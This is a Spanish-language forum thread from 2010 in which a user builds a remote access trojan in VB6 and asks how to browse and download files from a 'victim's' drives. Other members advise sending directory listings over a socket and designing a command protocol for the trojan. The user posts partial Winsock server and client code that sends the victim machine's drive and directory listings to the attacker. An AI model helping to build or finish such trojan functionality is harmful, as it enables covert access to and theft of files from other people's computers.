elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recopilación Tutoriales y Manuales Hacking, Seguridad, Privacidad, Hardware, etc


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  mi bixo parte 2 vb6
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: mi bixo parte 2 vb6  (Leído 3,961 veces)
Psyke1
Wiki

Desconectado Desconectado

Mensajes: 1.089



Ver Perfil WWW
mi bixo parte 2 vb6
« en: 14 Febrero 2010, 20:51 pm »

hola amigos, me gustaria saber como puedo ver los drives de mi victima, seleccionar el archivo y descargarlo, gracias a to2!!!


En línea

ninfas

Desconectado Desconectado

Mensajes: 42


Ver Perfil
Re: mi bixo parte 2 vb6
« Respuesta #1 en: 14 Febrero 2010, 20:56 pm »

Citar
los drives

los driver?  Amigo te recomiendo que busques y leas mucho  ;)



En línea

Psyke1
Wiki

Desconectado Desconectado

Mensajes: 1.089



Ver Perfil WWW
Re: mi bixo parte 2 vb6
« Respuesta #2 en: 14 Febrero 2010, 21:05 pm »

creo q me explike bn, ver los archivos de mi victima, seleccionar uno, y descargarlo...

gracias
En línea

seba123neo
Moderador
***
Desconectado Desconectado

Mensajes: 3.621



Ver Perfil WWW
Re: mi bixo parte 2 vb6
« Respuesta #3 en: 14 Febrero 2010, 21:32 pm »

Citar
los drives

Amigo te recomiendo que busques y leas mucho  ;)

digo lo mismo, *PsYkE1*  estas haciendo preguntas que se encuentran facil buscando un poco en internet...y los titulos de los post no son correctos, debes leer las normas del foro tambien, tus ultimos 4 post son de lo mismo y los titulos estan mal., un post mas asi y te lo voy a tener que borrar.

saludos.

« Última modificación: 14 Febrero 2010, 21:37 pm por seba123neo » En línea

Nanoc

Desconectado Desconectado

Mensajes: 166


Ver Perfil
Re: mi bixo parte 2 vb6
« Respuesta #4 en: 24 Febrero 2010, 01:30 am »

Forma dificil: Usa las apis para obtener la lista y envialas por el socket

Forma facil: Usa los controles dirlistbox y filelistbox para obtener la lista
En línea

Psyke1
Wiki

Desconectado Desconectado

Mensajes: 1.089



Ver Perfil WWW
Re: mi bixo parte 2 vb6
« Respuesta #5 en: 24 Febrero 2010, 14:56 pm »

ok voy a probar primero con la facil...
garcias ;D

respecto a la dificil seria algo asi, no? :huh:
http://www.recursosvisualbasic.com.ar/htm/listado-api/api-43.htm
« Última modificación: 24 Febrero 2010, 15:01 pm por *PsYkE1* » En línea

Snopk

Desconectado Desconectado

Mensajes: 32



Ver Perfil WWW
Re: mi bixo parte 2 vb6
« Respuesta #6 en: 24 Febrero 2010, 20:56 pm »

ok voy a probar primero con la facil...
garcias ;D

respecto a la dificil seria algo asi, no? :huh:
http://www.recursosvisualbasic.com.ar/htm/listado-api/api-43.htm

No, se refiere a usar Apis para listar los directorios, ese ejemplo usa controles para listarlos.
En línea

Nanoc

Desconectado Desconectado

Mensajes: 166


Ver Perfil
Re: mi bixo parte 2 vb6
« Respuesta #7 en: 24 Febrero 2010, 21:37 pm »

Exactamente, ese ejemplo usa los controles que mencione antes.

PD: Leandro ascierto XD te lo encuentras por todas partes con sus codes VB XD
En línea

Psyke1
Wiki

Desconectado Desconectado

Mensajes: 1.089



Ver Perfil WWW
Re: mi bixo parte 2 vb6
« Respuesta #8 en: 25 Febrero 2010, 15:00 pm »

yo sigo hacienolo por la forma facil, mira:

puse en el sever:
*drivelistbox
*dirlistbox
*flielistbox

y en el client:
*combobox
*treeview
*listbox

bien, gracias a este code he conseguido q me envie el contenido del drivelistbox del server al combobox del client:

SERVER
Código:
Private Sub pausa()

    Dim comenzar
    Dim controlar

    comenzar = Timer

    Do Until controlar >= comenzar + 0.01
        controlar = Timer
        DoEvents
    Loop

End Sub

Private Sub WS_DataArrival(ByVal bytesTotal As Long)
       
    Dim datos As String
    WS.GetData datos
   
    Select Case datos
   
    Case "getdrives"
    Dim x As Integer
    For x = 0 To Drive1.ListCount
    WS.SendData Drive1.List(x)
    pausa
    Next

    End Select

Bien, ahora mi duda esta en como mando el contenido del dirlistbox del server al treeview del client, se que he de hacer algo por el estilo:

CLIENT:
Código:
Private Sub Combo1_Change()

    WS.SendData Combo1.Text
   
End Sub
SERVER:
Código:
Private Sub WS_DataArrival(ByVal bytesTotal As Long)
       
    Dim datos As String
    WS.GetData datos
   
    Select Case datos
   
    Case "changedrive"
   
    Drive1.Path = datos

    Dim i As Integer
    For i = 0 To Dir1.ListCount
    WS.SendData Dir1.List(i)
    pausa
    Next

    End Select
todo ello teniendo en cuenta que antes puse:
Código:
SERVER:

Private Sub Dir1_Change()
   
    File1.Path = Dir1.Path
   
End Sub

Private Sub Drive1_Change()
    On Error Resume Next
    Directorios.Path = Drive1.Drive
   
End Sub
agradezco la ayuda!!!!!!!
En línea

Nanoc

Desconectado Desconectado

Mensajes: 166


Ver Perfil
Re: mi bixo parte 2 vb6
« Respuesta #9 en: 25 Febrero 2010, 15:46 pm »

Primero: utiliza listbox para listar tanto los directorios como los ficheros, lo mas aconsejable es que utilizes un bucle para ir agregando cada uno de los directorios a una variable de tipo string separandolos por comas, luego no tienes mas que enviar esa string y en el cliente utilizar la funcion split para separar la cadena por comas y asi tener un array con cada uno de los directorios por separado.

Ten en cuenta que para crear cualquier tipo de aplicacion de red es imprescindible crear un protocolo propio, es decir, como va a saber tu troyano que es lo que tiene que hacer con los datos que le envias, ejemplo:

para listar directorios puedes enviar un par de letras clave, por ejemplo "lf" y separando por comas los parametros (usas la funcion split para volver a separarlos") le indicas otras opciones que valla a necesitar el server para ejecutar la accion deseada, lo mismo para el cliente.

NO ES RECOMENDABLE que el cliente distinga la orden a realizar a partir de lo que el sabe, es decir:

El cliente envia la orden de listar directorios y ya asume que lo siguiente que reciba va a ser la lista de directorios. Como te he dicho antes, envia letras clave para distinguir la orden, te digo por experiencia propia que luego se producen muchas confusiones al usarlo, las cosas no funcionan siempre igual en local que en remoto, y aun asi hay que intentar que los programas sean capaces de funcionar correctamente en cualquier situacion

Espero haberte ayudado.  ;D
En línea

Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines